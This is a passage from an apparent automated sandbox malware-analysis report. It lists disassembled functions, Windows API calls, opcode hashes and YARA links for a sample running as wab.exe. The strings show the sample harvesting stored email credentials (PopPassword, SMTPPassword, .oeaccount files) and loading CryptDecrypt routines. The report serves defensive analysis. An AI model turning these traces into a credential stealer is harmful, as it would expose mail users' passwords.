                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 00406E44
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFontIndirect_mbscpymemset
                                                                                                                                                                                                          • String ID: Arial
                                                                                                                                                                                                          • API String ID: 3853255127-493054409
                                                                                                                                                                                                          • Opcode ID: af81b5a79715ac1c537919aec0876ca352f4b846121989fe158db9d7d4b71e29
                                                                                                                                                                                                          • Instruction ID: b68263c9f29210b4531b01fb65f498acbd183b68a5d206dac463ad1e531dcf8e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: af81b5a79715ac1c537919aec0876ca352f4b846121989fe158db9d7d4b71e29
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FFD0C974E4020C67DA10B7A0FC07F49776C5B01705F510421B901B10E2EAA4A15886D9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00444A0F Relevance: 3.1, APIs: 2, Instructions: 100COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                          • Instruction ID: ba634a3ae7870b83a4a63a7f1e5f980291c684f9ee159ca978f4bf55c64cb7ac
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C21F9521C82826FFB218BB44C017676FD9CBD3364B190A87E040EB243D5AC5856937E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040CB90 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00401E60: memset.MSVCRT ref: 00401E82
                                                                                                                                                                                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401E9B
                                                                                                                                                                                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EA9
                                                                                                                                                                                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EEF
                                                                                                                                                                                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EFD
                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040CBE4
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: strlen$_strcmpimemset
                                                                                                                                                                                                          • String ID: /stext
                                                                                                                                                                                                          • API String ID: 520177685-3817206916
                                                                                                                                                                                                          • Opcode ID: 1152ae9ba3ffa0329dd0f68586efa17a4cc19575da3326fd738d138d66e7bba5
                                                                                                                                                                                                          • Instruction ID: cdbc65eb55c3596dd52c6b91df7f07afa5e13005eab10b9a6f004d04cd94ae5a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1152ae9ba3ffa0329dd0f68586efa17a4cc19575da3326fd738d138d66e7bba5
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE216271618111DFD35CEB39D8C1A66B3A9FF04314B15427FF41AA7282C738EC118B89
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00444A4E Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                          • Instruction ID: 64d8077581e7bfcf5b5a7686d9ec621b59dbeaea1ec513f5aad7139115001ce4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C012D015C564139FB20A6F50C02BBB5F8D8AD7364B181B4BF150F7293D99C8D16937E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00444A6B Relevance: 3.1, APIs: 2, Instructions: 54memoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00444A5C,00444A45), ref: 00444A7E
                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00444A5C,00444A45), ref: 00444A92
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                          • Instruction ID: 9d415219164cce1615491981170e8b778fb578cfb811cd04a9329a68800e1f42
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DCF0C2412C52817DFB2195F50C42BBB4FCC8AE7360B280B47B110EB283D49D8D1693BE
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040472F Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00404780: FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 145871493-0
                                                                                                                                                                                                          • Opcode ID: 19cbb58c83f46949a6f81fbd15abd7b556fa9c3d80d4a4eb7eee3cb29104cd1a
                                                                                                                                                                                                          • Instruction ID: 2550b76864eeaa7c500838184e9c491a546ed4ce74a868b02878dd57666eb7ef
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19cbb58c83f46949a6f81fbd15abd7b556fa9c3d80d4a4eb7eee3cb29104cd1a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5F01BF4600B029FD760AF35E848B9B77E5AF86710F00453EF665E3182D778A545CB58
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004103E0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410407
                                                                                                                                                                                                            • Part of subcall function 004102F8: memset.MSVCRT ref: 00410316
                                                                                                                                                                                                            • Part of subcall function 004102F8: _itoa.MSVCRT ref: 0041032D
                                                                                                                                                                                                            • Part of subcall function 004102F8: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0041033C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 4165544737-0
                                                                                                                                                                                                          • Opcode ID: 0dc81d5659c27ec3f684feb4a7343de4234ed54be118f3a80d7180ba5ee1fafc
                                                                                                                                                                                                          • Instruction ID: a6fec7de448531cc7e5bdd8bb9ba05dfe42c6da5839e04c605b7484fd2ec2d67
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0dc81d5659c27ec3f684feb4a7343de4234ed54be118f3a80d7180ba5ee1fafc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23E0BD3204060EBFCF125F80EC05AAA7BA6FF04354F24886AFD6804121D77299F0AB99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00404780 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                          • Opcode ID: 0080a8822f3c614f9ebefc2abddcc045fe481ba4110b5f37c1852287057a9d03
                                                                                                                                                                                                          • Instruction ID: 32a23a6afe1256adb8d295dcdce629e4b632fcbc5e0d618fa027d99050396328
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0080a8822f3c614f9ebefc2abddcc045fe481ba4110b5f37c1852287057a9d03
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7D012714003118FDB609F14FD4CBA173E8AF41312F1504B8E994AB192C3749840CA58
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00406AB8 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040ABFF,00000000), ref: 00406ACA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                          • Opcode ID: 1ce9c131fa00a6cba9e51da9fc4262f8f7b5bc2fb1b2ae73e770c5136e6a3475
                                                                                                                                                                                                          • Instruction ID: 174152b0962da7481451d0c07619c80c3ba7c59bd8607505f6d9dddbb6799519
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ce9c131fa00a6cba9e51da9fc4262f8f7b5bc2fb1b2ae73e770c5136e6a3475
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08C012F06503007FFF204B10AC0AF37369DD780700F1044207E00E40E1C2A14C40C524
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00410166 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,00403C1D), ref: 00410172
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                                          • Opcode ID: 2bb0b70da7ab9a9f1d06c574187436387b11b6424b20dab8934fc130d0c11713
                                                                                                                                                                                                          • Instruction ID: 507e23945262d0460dd2b0da46a8ed0ea94319227dbecdfb5597338915b85de2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bb0b70da7ab9a9f1d06c574187436387b11b6424b20dab8934fc130d0c11713
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6EC04C35510B019BEB219B22D949753B7E4AB05316F40C81CA59695451D7BCE494CE18
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00410663 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EnumResourceNamesA.KERNEL32(?,?,Function_000105DD,00000000), ref: 00410672
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: EnumNamesResource
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3334572018-0
                                                                                                                                                                                                          • Opcode ID: 11eb8b3ad73b6762afc3db70ccaf6c8089b2cfe60785521265f3d13c2ac885fb
                                                                                                                                                                                                          • Instruction ID: e40f58546d13f5b106010a29914381b046978f91ca1901c00a2019c551bf0e65
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11eb8b3ad73b6762afc3db70ccaf6c8089b2cfe60785521265f3d13c2ac885fb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0C09B31554341A7C701DF108C09F1A7695BB55705F504C297151940A4C7514054DB15
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00407D1F Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindClose.KERNELBASE(?,00407C39,?,?,00000000,.8D,0044373A,*.oeaccount,.8D,?,00000104), ref: 00407D29
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseFind
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1863332320-0
                                                                                                                                                                                                          • Opcode ID: fadcbaaacaeb9138fef9dc8452ad8ac79757f966f14a2d9034369e41b7735666
                                                                                                                                                                                                          • Instruction ID: e21386352e8edd65572014a1fcaa83e24a75218a268847cd9e3b74dd15e40f0a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fadcbaaacaeb9138fef9dc8452ad8ac79757f966f14a2d9034369e41b7735666
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50C092349109018FD62C9F38DC5A52A77A0BF5A3343B40F6CA0F3D20F0E778A842CA08
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00410411 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Open
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                                                                          • Opcode ID: 21d2125e3753e601ca1b20deba59a5865270c48a78257e55b283f3ccc3de6cc0
                                                                                                                                                                                                          • Instruction ID: 9e85f5290c785a84adc9a585aa79e4266a03e2402c05001ad2ac5d5d83fda341
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21d2125e3753e601ca1b20deba59a5865270c48a78257e55b283f3ccc3de6cc0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40C09B39544301BFDE114F40FD05F09BB61BB84F05F504414B244240B182714414EB57
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00406D1F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                                          • Opcode ID: 2ea5a109eb267fb6083926362ae3c8176b926bbef034cd1da8757df3be379db2
                                                                                                                                                                                                          • Instruction ID: 1a596b20ff26773e60743876e99a20c5f0c5c53ebb8dbfb842e64d2fd6ed3a7e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ea5a109eb267fb6083926362ae3c8176b926bbef034cd1da8757df3be379db2
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76B012792108005FCF1807349C4904D35506F45631760073CF033C00F0D720CC60BA00
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                          Function 004047C6 Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A6B,?,00404981,?,?,00000000,?,00000000,?), ref: 004047D5
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047E9
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptReleaseContext), ref: 004047F5
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptCreateHash), ref: 00404801
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptGetHashParam), ref: 0040480D
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptHashData), ref: 00404819
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptDestroyHash), ref: 00404825
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptDecrypt), ref: 00404831
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptDeriveKey), ref: 0040483D
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptImportKey), ref: 00404849
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(0045175C,CryptDestroyKey), ref: 00404855
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                          • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                                          • API String ID: 2238633743-192783356
                                                                                                                                                                                                          • Opcode ID: cdc1f63c0c232f946f357b8b2aefe836e2e50651c8dba3e6496bd37ee8642a43
                                                                                                                                                                                                          • Instruction ID: 96d911507a8a1b00aef88e3b883ab5eac538cf63a3166b36270edd586bbeed94
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cdc1f63c0c232f946f357b8b2aefe836e2e50651c8dba3e6496bd37ee8642a43
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A501C974940744AFDB31AF769C09E06BEF1EFA97003224D2EE2C553650D77AA010DE49
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00402DA5 Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 153registryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                            • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                                            • Part of subcall function 0041042B: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402928,?,?,?,?,00402928,?,?), ref: 0041044A
                                                                                                                                                                                                            • Part of subcall function 00410475: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040264A,?), ref: 0041048B
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402EBC
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402ECF
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402F5C
                                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00402F69
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00402FC3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _mbscpy$QueryValue$CloseOpen
                                                                                                                                                                                                          • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                                                                                                                                          • API String ID: 52435246-1534328989
                                                                                                                                                                                                          • Opcode ID: 8606da5831358c67b4a99ee8b6ad117f72868ee6eb846870c269daa592ef00d8
                                                                                                                                                                                                          • Instruction ID: 400a04a5c8efacb9c4641a70875855bf6b7e4888715d32951425251a7c23a99d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8606da5831358c67b4a99ee8b6ad117f72868ee6eb846870c269daa592ef00d8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 575130B1900118BBEF11EB51DD41FEE777CAF04754F5080A7BA0CA6192DBB89B858F98
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00406B9A Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00406BA4
                                                                                                                                                                                                            • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00406BC1
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406BD2
                                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 00406BDF
                                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BF2
                                                                                                                                                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 00406C01
                                                                                                                                                                                                          • SetClipboardData.USER32(00000001,00000000), ref: 00406C0A
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00406C12
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00406C1E
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00406C29
                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 00406C32
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.12092649182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2565263379-0
                                                                                                                                                                                                          • Opcode ID: 1b6e565173029c6444be00b6b2d36f782b825a097f2130a1a97e673a6d3a71af
                                                                                                                                                                                                          • Instruction ID: 428d7c431cb1422a1915013c6704b220f4cf118cce9454ff27e0024ace88079b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b6e565173029c6444be00b6b2d36f782b825a097f2130a1a97e673a6d3a71af
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2114239904605FFEF105FA4DC4CB9E7FB8EB46755F104035F542E1192DB7489508A69
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00406C3D Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemorystringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00406C45
                                                                                                                                                                                                          • strlen.MSVCRT ref: 00406C52
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C0BB,?), ref: 00406C61
                                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 00406C6E
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406C77
                                                                                                                                                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 00406C80
